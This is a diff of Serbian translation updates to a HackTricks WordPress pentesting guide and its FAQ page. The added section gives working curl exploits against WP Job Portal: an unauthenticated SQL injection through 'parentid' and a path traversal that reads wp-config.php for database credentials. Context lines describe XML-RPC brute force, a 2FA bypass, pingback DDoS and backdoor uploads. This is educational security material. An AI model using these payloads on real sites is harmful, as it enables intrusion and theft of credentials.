Translated ['src/network-services-pentesting/pentesting-web/wordpress.md

src/network-services-pentesting/pentesting-web/wordpress.md

@@ -5,7 +5,7 @@
 ## Osnovne informacije
 
 - **Uploaded** datoteke idu na: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`
-- **Teme se mogu naći u /wp-content/themes/,** tako da ako promenite neki php u temi da biste dobili RCE, verovatno ćete koristiti taj put. Na primer: Koristeći **temu twentytwelve** možete **pristupiti** **404.php** datoteci u: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
+- **Datoteke tema se mogu naći u /wp-content/themes/,** tako da ako promenite neki php u temi da biste dobili RCE, verovatno ćete koristiti taj put. Na primer: Koristeći **temu twentytwelve** možete **pristupiti** **404.php** datoteci u: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
 
 - **Još jedan koristan URL može biti:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
 
@@ -16,7 +16,7 @@
 
 - `index.php`
 - `license.txt` sadrži korisne informacije kao što je verzija WordPress-a koja je instalirana.
-- `wp-activate.php` se koristi za proces aktivacije putem e-pošte prilikom postavljanja nove WordPress stranice.
+- `wp-activate.php` se koristi za proces aktivacije putem e-pošte prilikom postavljanja novog WordPress sajta.
 - Folderi za prijavu (mogu biti preimenovani da bi se sakrili):
 - `/wp-admin/login.php`
 - `/wp-admin/wp-login.php`
@@ -37,7 +37,7 @@
 - **Administrator**
 - **Urednik**: Objavljuje i upravlja svojim i tuđim postovima
 - **Autor**: Objavljuje i upravlja svojim postovima
-- **Doprinosilac**: Piše i upravlja svojim postovima, ali ih ne može objaviti
+- **Saradnik**: Piše i upravlja svojim postovima, ali ih ne može objaviti
 - **Pretplatnik**: Pregleda postove i uređuje svoj profil
 
 ## **Pasivna enumeracija**
@@ -79,11 +79,11 @@ curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/supp
 
 ### Plugin-i i Teme
 
-Verovatno nećete moći da pronađete sve moguće Plugin-e i Teme. Da biste ih otkrili, moraćete da **aktivno Brute Force-ujete listu Plugin-a i Tema** (na sreću, postoje automatski alati koji sadrže ove liste).
+Verovatno nećete moći da pronađete sve moguće Plugin-e i Teme. Da biste ih otkrili, moraćete da **aktivno Brute Force-ujete listu Plugin-a i Tema** (nadamo se da postoje automatski alati koji sadrže ove liste).
 
 ### Korisnici
 
-- **ID Brute:** Dobijate validne korisnike sa WordPress sajta Brute Forcing-om ID-eva korisnika:
+- **ID Brute:** Dobijate validne korisnike sa WordPress sajta Brute Forcing-om korisničkih ID-eva:
 ```bash
 curl -s -I -X GET http://blog.example.com/?author=1
 ```
@@ -97,11 +97,11 @@ Još jedan `/wp-json/` krajnji tačka koja može otkriti neke informacije o kori
 ```bash
 curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
 ```
-Napomena da ovaj krajnji tačka izlaže samo korisnike koji su napravili post. **Samo informacije o korisnicima koji imaju ovu funkciju omogućenu će biti pružene**.
+Napomena da ovaj krajnji tačka izlaže samo korisnike koji su napravili post. **Samo informacije o korisnicima koji imaju ovu funkciju omogućenu biće pružene**.
 
-Takođe, napomena da **/wp-json/wp/v2/pages** može da otkrije IP adrese.
+Takođe, imajte na umu da **/wp-json/wp/v2/pages** može da otkrije IP adrese.
 
-- **Enumeracija korisničkih imena za prijavu**: Kada se prijavljujete na **`/wp-login.php`**, **poruka** je **drugačija** u zavisnosti od toga da li je navedeno **korisničko ime postoji ili ne**.
+- **Enumeracija korisničkih imena za prijavu**: Kada se prijavljujete na **`/wp-login.php`**, **poruka** je **drugačija** u zavisnosti od toga da li je **korisničko ime postoji ili ne**.
 
 ### XML-RPC
 
@@ -132,7 +132,7 @@ Da biste proverili da li je aktivan, pokušajte da pristupite _**/xmlrpc.php**_
 ```
 Poruka _"Pogrešno korisničko ime ili lozinka"_ unutar odgovora sa kodom 200 treba da se pojavi ako akreditivi nisu validni.
 
-![](<../../images/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (4) (1).png>)
+![](<../../images/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (4) (1).png>)
 
 ![](<../../images/image (721).png>)
 
@@ -166,17 +166,17 @@ Korišćenjem ispravnih akreditiva možete da otpremite datoteku. U odgovoru će
 </params>
 </methodCall>
 ```
-Takođe postoji **brži način** za brute-force kredencijale koristeći **`system.multicall`** jer možete isprobati nekoliko kredencijala u istom zahtevu:
+Takođe postoji **brži način** za brute-force kredencijale koristeći **`system.multicall`** jer možete pokušati nekoliko kredencijala u istom zahtevu:
 
 <figure><img src="../../images/image (628).png" alt=""><figcaption></figcaption></figure>
 
 **Obilaženje 2FA**
 
-Ova metoda je namenjena programima, a ne ljudima, i stara je, stoga ne podržava 2FA. Dakle, ako imate važeće kredencijale, ali je glavni ulaz zaštićen 2FA, **možda ćete moći da zloupotrebite xmlrpc.php da se prijavite sa tim kredencijalima obilažeći 2FA**. Imajte na umu da nećete moći da izvršite sve radnje koje možete da uradite putem konzole, ali možda ćete i dalje moći da dođete do RCE-a kao što Ippsec objašnjava u [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw&t=1130s)
+Ova metoda je namenjena programima, a ne ljudima, i stara je, stoga ne podržava 2FA. Dakle, ako imate važeće kredencijale, ali je glavni ulaz zaštićen 2FA, **možda ćete moći da iskoristite xmlrpc.php da se prijavite sa tim kredencijalima obilažeći 2FA**. Imajte na umu da nećete moći da izvršite sve radnje koje možete da uradite putem konzole, ali možda ćete i dalje moći da dođete do RCE-a kao što Ippsec objašnjava u [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw&t=1130s)
 
 **DDoS ili skeniranje portova**
 
-Ako možete pronaći metodu _**pingback.ping**_ unutar liste, možete naterati Wordpress da pošalje proizvoljan zahtev bilo kojem hostu/portu.\
+Ako možete pronaći metodu _**pingback.ping**_ unutar liste, možete naterati Wordpress da pošalje proizvoljan zahtev bilo kom hostu/portu.\
 Ovo se može koristiti da se zatraži **hiljade** Wordpress **sajtova** da **pristupe** jednoj **lokaciji** (tako da se izazove **DDoS** u toj lokaciji) ili možete to koristiti da naterate **Wordpress** da **skanira** neku internu **mrežu** (možete naznačiti bilo koji port).
 ```html
 <methodCall>
@@ -217,7 +217,7 @@ Preporučuje se da se onemogući Wp-Cron i da se kreira pravi cronjob unutar hos
 
 Pokušajte da pristupite _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_ i Wordpress sajt može da pošalje zahtev ka vama.
 
-Ovo je odgovor kada ne funkcioniše:
+Ovo je odgovor kada ne radi:
 
 ![](<../../images/image (365).png>)
 
@@ -244,7 +244,7 @@ return new WP_Error(
 ```
 ## **Panel RCE**
 
-**Modifikovanje php iz teme koja se koristi (potrebne admin kredencijale)**
+**Modifikovanje php iz teme koja se koristi (potrebne su admin kredencijali)**
 
 Izgled → Urednik teme → 404 Šablon (s desne strane)
 
@@ -266,7 +266,7 @@ to get a session.
 
 ### PHP plugin
 
-Možda je moguće uploadovati .php fajlove kao plugin.\
+Možda će biti moguće uploadovati .php fajlove kao plugin.\
 Kreirajte svoj php backdoor koristeći, na primer:
 
 ![](<../../images/image (183).png>)
@@ -302,16 +302,16 @@ Ova metoda uključuje instalaciju malicioznog plugina za koji se zna da je ranji
 3. **Plugin Activation**: Kada je plugin uspešno instaliran, mora se aktivirati kroz kontrolnu tablu.
 4. **Exploitation**:
 - Sa instaliranim i aktiviranim pluginom "reflex-gallery", može se iskoristiti jer je poznato da je ranjiv.
-- Metasploit framework pruža exploit za ovu ranjivost. Učitajte odgovarajući modul i izvršite specifične komande da biste uspostavili meterpreter sesiju, što omogućava neovlašćen pristup sajtu.
+- Metasploit framework pruža exploit za ovu ranjivost. Učitajte odgovarajući modul i izvršite specifične komande, može se uspostaviti meterpreter sesija, što omogućava neovlašćen pristup sajtu.
 - Napominje se da je ovo samo jedna od mnogih metoda za iskorišćavanje WordPress sajta.
 
-Sadržaj uključuje vizuelne prikaze koraka u WordPress kontrolnoj tabli za instalaciju i aktivaciju plugina. Međutim, važno je napomenuti da je iskorišćavanje ranjivosti na ovaj način ilegalno i neetično bez odgovarajuće dozvole. Ove informacije treba koristiti odgovorno i samo u legalnom kontekstu, kao što je pentesting sa izričitom dozvolom.
+Sadržaj uključuje vizuelne prikaze koji prikazuju korake u WordPress kontrolnoj tabli za instalaciju i aktivaciju plugina. Međutim, važno je napomenuti da je iskorišćavanje ranjivosti na ovaj način ilegalno i neetično bez odgovarajuće dozvole. Ove informacije treba koristiti odgovorno i samo u legalnom kontekstu, kao što je pentesting sa izričitom dozvolom.
 
-**For more detailed steps check:** [**https://www.hackingarticles.in/wordpress-reverse-shell/**](https://www.hackingarticles.in/wordpress-reverse-shell/)
+**Za detaljnije korake proverite:** [**https://www.hackingarticles.in/wordpress-reverse-shell/**](https://www.hackingarticles.in/wordpress-reverse-shell/)
 
 ## From XSS to RCE
 
-- [**WPXStrike**](https://github.com/nowak0x01/WPXStrike): _**WPXStrike**_ je skripta dizajnirana da eskalira **Cross-Site Scripting (XSS)** ranjivost na **Remote Code Execution (RCE)** ili druge kritične ranjivosti u WordPress-u. Za više informacija pogledajte [**this post**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html). Pruža **podršku za Wordpress verzije 6.X.X, 5.X.X i 4.X.X i omogućava:**
+- [**WPXStrike**](https://github.com/nowak0x01/WPXStrike): _**WPXStrike**_ je skripta dizajnirana da eskalira **Cross-Site Scripting (XSS)** ranjivost na **Remote Code Execution (RCE)** ili druge kritične ranjivosti u WordPress-u. Za više informacija proverite [**this post**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html). Pruža **podršku za Wordpress verzije 6.X.X, 5.X.X i 4.X.X i omogućava:**
 - _**Privilege Escalation:**_ Kreira korisnika u WordPress-u.
 - _**(RCE) Custom Plugin (backdoor) Upload:**_ Uploadujte svoj prilagođeni plugin (backdoor) u WordPress.
 - _**(RCE) Built-In Plugin Edit:**_ Uredite ugrađene plugine u WordPress-u.
@@ -336,7 +336,7 @@ Znanje o tome kako Wordpress dodatak može izložiti funkcionalnost je ključno
 
 - **`wp_ajax`**
 
-Jedan od načina na koji dodatak može izložiti funkcije korisnicima je putem AJAX handler-a. Ovi handler-i mogu sadržati logiku, greške u autorizaciji ili autentifikaciji. Štaviše, često se dešava da će ove funkcije zasnivati i autentifikaciju i autorizaciju na postojanju Wordpress nonce-a koji **bilo koji korisnik autentifikovan u Wordpress instanci može imati** (nezavisno od njegove uloge).
+Jedan od načina na koji dodatak može izložiti funkcije korisnicima je putem AJAX handler-a. Ovi handler-i mogu sadržati logiku, greške u autorizaciji ili autentifikaciji. Štaviše, često se dešava da će ove funkcije bazirati i autentifikaciju i autorizaciju na postojanju wordpress nonce-a koji **bilo koji korisnik autentifikovan u Wordpress instanci može imati** (nezavisno od njegove uloge).
 
 Ovo su funkcije koje se mogu koristiti za izlaganje funkcije u dodatku:
 ```php
@@ -366,7 +366,7 @@ $this->namespace, '/get/', array(
 
 - **Direktan pristup php datoteci**
 
-Naravno, WordPress koristi PHP i datoteke unutar dodataka su direktno dostupne sa veba. Dakle, u slučaju da dodatak izlaže bilo koju ranjivu funkcionalnost koja se aktivira jednostavnim pristupom datoteci, biće eksploatabilna od strane bilo kog korisnika.
+Naravno, Wordpress koristi PHP i datoteke unutar dodataka su direktno dostupne sa veba. Dakle, u slučaju da dodatak izlaže bilo koju ranjivu funkcionalnost koja se aktivira jednostavnim pristupom datoteci, biće eksploatabilna od strane bilo kog korisnika.
 
 ### Neautentifikovano proizvoljno brisanje datoteka putem wp_ajax_nopriv (Litho Tema <= 3.0)
 
@@ -448,7 +448,7 @@ add_action( 'wp_ajax_litho_remove_font_family_action_data', 'secure_remove_font_
 
 ### Redovne ažuriranja
 
-Proverite da li su WordPress, dodaci i teme ažurirani. Takođe potvrdite da je automatsko ažuriranje omogućeno u wp-config.php:
+Uverite se da su WordPress, dodaci i teme ažurirani. Takođe potvrdite da je automatsko ažuriranje omogućeno u wp-config.php:
 ```bash
 define( 'WP_AUTO_UPDATE_CORE', true );
 add_filter( 'auto_update_plugin', '__return_true' );
@@ -470,8 +470,65 @@ Takođe, **instalirajte samo pouzdane WordPress dodatke i teme**.
 - **Ograničite pokušaje prijavljivanja** kako biste sprečili Brute Force napade
 - Preimenujte **`wp-admin.php`** datoteku i dozvolite pristup samo interno ili sa određenih IP adresa.
 
+### Neautentifikovana SQL injekcija putem nedovoljne validacije (WP Job Portal <= 2.3.2)
+
+WP Job Portal dodatak za zapošljavanje je izložio **savecategory** zadatak koji na kraju izvršava sledeći ranjivi kod unutar `modules/category/model.php::validateFormData()`:
+```php
+$category  = WPJOBPORTALrequest::getVar('parentid');
+$inquery   = ' ';
+if ($category) {
+$inquery .= " WHERE parentid = $category ";   // <-- direct concat ✗
+}
+$query  = "SELECT max(ordering)+1 AS maxordering FROM "
+. wpjobportal::$_db->prefix . "wj_portal_categories " . $inquery; // executed later
+```
+Issues introduced by this snippet:
+
+1. **Nepročišćeni korisnički unos** – `parentid` dolazi direktno iz HTTP zahteva.
+2. **Konkatenacija stringova unutar WHERE klauzule** – nema `is_numeric()` / `esc_sql()` / pripremljene izjave.
+3. **Neautentifikovana dostupnost** – iako se akcija izvršava putem `admin-post.php`, jedina provera koja postoji je **CSRF nonce** (`wp_verify_nonce()`), koji svaki posetilac može preuzeti sa javne stranice koja uključuje shortcode `[wpjobportal_my_resumes]`.
+
+#### Eksploatacija
+
+1. Preuzmite svež nonce:
+```bash
+curl -s https://victim.com/my-resumes/ | grep -oE 'name="_wpnonce" value="[a-f0-9]+' | cut -d'"' -f4
+```
+2. Injektujte proizvoljni SQL zloupotrebom `parentid`:
+```bash
+curl -X POST https://victim.com/wp-admin/admin-post.php \
+-d 'task=savecategory' \
+-d '_wpnonce=<nonce>' \
+-d 'parentid=0 OR 1=1-- -' \
+-d 'cat_title=pwn' -d 'id='
+```
+Odgovor otkriva rezultat injektovane upita ili menja bazu podataka, dokazujući SQLi.
+
+
+### Neautentifikovano preuzimanje proizvoljnih fajlova / Putanja Traversal (WP Job Portal <= 2.3.2)
+
+Još jedan zadatak, **downloadcustomfile**, omogućio je posetiocima da preuzmu **bilo koji fajl na disku** putem putanje traversal. Ranjiva tačka se nalazi u `modules/customfield/model.php::downloadCustomUploadedFile()`:
+```php
+$file = $path . '/' . $file_name;
+...
+echo $wp_filesystem->get_contents($file); // raw file output
+```
+`$file_name` је под контролом нападача и конкатенован је **без санитаризације**. Опет, једини пролаз је **CSRF nonce** који се може преузети са странице за резиме.
+
+#### Искоришћавање
+```bash
+curl -G https://victim.com/wp-admin/admin-post.php \
+--data-urlencode 'task=downloadcustomfile' \
+--data-urlencode '_wpnonce=<nonce>' \
+--data-urlencode 'upload_for=resume' \
+--data-urlencode 'entity_id=1' \
+--data-urlencode 'file_name=../../../wp-config.php'
+```
+Server odgovara sa sadržajem `wp-config.php`, otkrivajući DB akreditive i auth ključeve.
+
 ## Reference
 
 - [Unauthenticated Arbitrary File Deletion Vulnerability in Litho Theme](https://patchstack.com/articles/unauthenticated-arbitrary-file-delete-vulnerability-in-litho-the/)
+- [Multiple Critical Vulnerabilities Patched in WP Job Portal Plugin](https://patchstack.com/articles/multiple-critical-vulnerabilities-patched-in-wp-job-portal-plugin/)
 
 {{#include ../../banners/hacktricks-training.md}}

src/welcome/hacktricks-values-and-faq.md

@@ -44,11 +44,11 @@ Ne zaboravite da **dajte zvezdicu na Github projektima!**
 >
 > - **Mogu li kopirati neki sadržaj iz HackTricks i staviti ga na svoj blog?**
 
-Da, možete, ali **ne zaboravite da navedete specifičan link(ove)** sa kojih je sadržaj preuzet.
+Da, možete, ali **ne zaboravite da pomenete specifični link(ove)** sa kojih je sadržaj preuzet.
 
 > [!TIP]
 >
-> - **Kako mogu citirati stranicu HackTricks?**
+> - **Kako mogu  stranicu HackTricks?**
 
 Sve dok se link **stranice** sa koje ste uzeli informacije pojavljuje, to je dovoljno.\
 Ako vam je potreban bibtex, možete koristiti nešto poput:
@@ -76,7 +76,7 @@ Prva **HackTricks** **vrednost** je da ponudi **BESPLATNE** obrazovne resurse za
 
 Ako mislite da su HackTricks knjige napravljene za **komercijalne svrhe**, **POTPUNO STE U GREŠCI**.
 
-Imamo sponzore jer, iako je sav sadržaj BESPLATAN, želimo da **ponudimo zajednici mogućnost da ceni naš rad** ako to žele. Stoga, nudimo ljudima opciju da doniraju HackTricks putem [**Github sponzora**](https://github.com/sponsors/carlospolop), i **relevantnim kompanijama za sajber bezbednost** da sponzorišu HackTricks i da **imaju neke oglase** u knjizi, pri čemu su **oglasi** uvek postavljeni na mestima gde ih čine **vidljivim**, ali **ne ometaju proces učenja** ako se neko fokusira na sadržaj.
+Imamo sponzore jer, iako je sav sadržaj BESPLATAN, želimo da **ponudimo zajednici mogućnost da ceni naš rad** ako to žele. Stoga, nudimo ljudima opciju da doniraju HackTricks putem [**Github sponzora**](https://github.com/sponsors/carlospolop), i **relevantne kompanije za sajber bezbednost** da sponzorišu HackTricks i da **imaju neke oglase** u knjizi, pri čemu su **oglasi** uvek postavljeni na mestima gde ih čine **vidljivim**, ali **ne ometaju proces učenja** ako se neko fokusira na sadržaj.
 
 Nećete naći HackTricks ispunjen dosadnim oglasima kao druge blogove sa mnogo manje sadržaja od HackTricks, jer HackTricks nije napravljen za komercijalne svrhe.
 
@@ -84,7 +84,7 @@ Nećete naći HackTricks ispunjen dosadnim oglasima kao druge blogove sa mnogo m
 >
 > - **Šta da radim ako neka HackTricks stranica se zasniva na mom blog postu, ali nije referencirana?**
 
-**Veoma nam je žao. Ovo se nije smelo desiti**. Molimo vas, javite nam putem Github problema, Twitter-a, Discord-a... link HackTricks stranice sa sadržajem i link vašeg bloga i **proverićemo to i dodati ASAP**.
+**Veoma nam je žao. Ovo se nije smelo desiti**. Molimo vas, javite nam putem Github issues, Twitter-a, Discord-a... link HackTricks stranice sa sadržajem i link vašeg bloga i **proverićemo to i dodati ASAP**.
 
 > [!CAUTION]
 >
@@ -112,7 +112,7 @@ Copyright © Sva prava zadržana osim ako nije drugačije navedeno.
 
 - Attribution: Slobodni ste da:
 - Share — kopirate i redistribuirate materijal u bilo kom mediju ili formatu.
-- Adapt — remiksujete, transformišete i gradite na materijalu.
+- Adapt — remiksirate, transformišete i gradite na materijalu.
 
 #### Additional Terms:
 
@@ -130,13 +130,13 @@ Ova licenca ne dodeljuje nikakva prava na zaštitni znak ili brendiranje u vezi
 ## **Disclaimer**
 
 > [!CAUTION]
-> Ova knjiga, 'HackTricks,' je namenjena isključivo obrazovnim i informativnim svrhama. Sadržaj unutar ove knjige je dostupan na osnovu 'kako jeste', i autori i izdavači ne daju nikakve izjave ili garancije bilo koje vrste, izričite ili implicirane, o potpunosti, tačnosti, pouzdanosti, pogodnosti ili dostupnosti informacija, proizvoda, usluga ili povezanih grafika sadržanih unutar ove knjige. Svako oslanjanje na takve informacije je stoga strogo na vaš sopstveni rizik.
+> Ova knjiga, 'HackTricks,' je namenjena isključivo obrazovnim i informativnim svrhama. Sadržaj unutar ove knjige je dostupan na 'kako jeste' osnovi, a autori i izdavači ne daju nikakve izjave ili garancije bilo koje vrste, izričite ili implicirane, o potpunosti, tačnosti, pouzdanosti, pogodnosti ili dostupnosti informacija, proizvoda, usluga ili povezanih grafika sadržanih unutar ove knjige. Svako oslanjanje na takve informacije je stoga strogo na vaš sopstveni rizik.
 >
 > Autori i izdavači u nijednom slučaju neće biti odgovorni za bilo kakav gubitak ili štetu, uključujući, bez ograničenja, indirektne ili posledične gubitke ili štete, ili bilo kakav gubitak ili štetu koja proizađe iz gubitka podataka ili profita koji proizađu iz, ili u vezi sa, korišćenjem ove knjige.
 >
-> Štaviše, tehnike i saveti opisani u ovoj knjizi su pruženi isključivo u obrazovne i informativne svrhe, i ne bi trebali biti korišćeni za bilo kakve ilegalne ili zlonamerne aktivnosti. Autori i izdavači ne odobravaju niti podržavaju bilo kakve ilegalne ili neetičke aktivnosti, i svaka upotreba informacija sadržanih unutar ove knjige je na korisnikov sopstveni rizik i diskreciju.
+> Štaviše, tehnike i saveti opisani u ovoj knjizi su pruženi isključivo u obrazovne i informativne svrhe i ne bi trebali biti korišćeni za bilo kakve ilegalne ili zlonamerne aktivnosti. Autori i izdavači ne odobravaju niti podržavaju bilo kakve ilegalne ili neetičke aktivnosti, a svaka upotreba informacija sadržanih unutar ove knjige je na korisnikov sopstveni rizik i diskreciju.
 >
-> Korisnik je isključivo odgovoran za bilo kakve radnje preduzete na osnovu informacija sadržanih unutar ove knjige, i uvek bi trebao potražiti profesionalni savet i pomoć prilikom pokušaja implementacije bilo koje od tehnika ili saveta opisanih ovde.
+> Korisnik je isključivo odgovoran za bilo kakve radnje preduzete na osnovu informacija sadržanih unutar ove knjige i uvek bi trebao potražiti profesionalni savet i pomoć prilikom pokušaja implementacije bilo koje od tehnika ili saveta opisanih ovde.
 >
 > Korišćenjem ove knjige, korisnik se slaže da oslobodi autore i izdavače od bilo kakve i svake odgovornosti za bilo kakve štete, gubitke ili povrede koje mogu proizaći iz korišćenja ove knjige ili bilo koje od informacija sadržanih u njoj.